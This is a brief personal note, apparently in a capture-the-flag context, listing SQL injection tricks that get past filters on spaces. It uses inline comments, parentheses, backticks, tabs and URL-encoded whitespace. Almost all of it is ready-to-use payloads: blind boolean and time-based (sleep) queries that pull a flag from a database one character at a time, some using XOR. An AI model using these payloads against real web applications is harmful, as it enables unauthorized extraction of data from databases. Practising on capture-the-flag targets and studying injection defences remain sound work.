Noting down a few SQL injection bypass tricks; they should come in handy later.

Replacing spaces

1. Inline comments

select/**/*from/**/user;

2. Using parentheses

select * from user where id = 1 and (if(ascii(substr(database()from(1)for(1)))=115,sleep(4),null));

This can be combined with XOR:

select * from user where id=1^(SELECT(ASCII(MID((SELECT((flag))FROM(ctf)),1,1))=1))^1=1

3. Backticks

select * from passage where id=1^(SELECT(ASCII(MID((SELECT`flag`FROM`ctf`),1,1))=102))^1=1;

4. Tab, or two spaces

select content from passage where id=ELT(left((select    flag    from    ctf),1)='f',SLEEP(1))

5. URL encoding

%20 %09 %0a %0b %0c %0d %a0 %00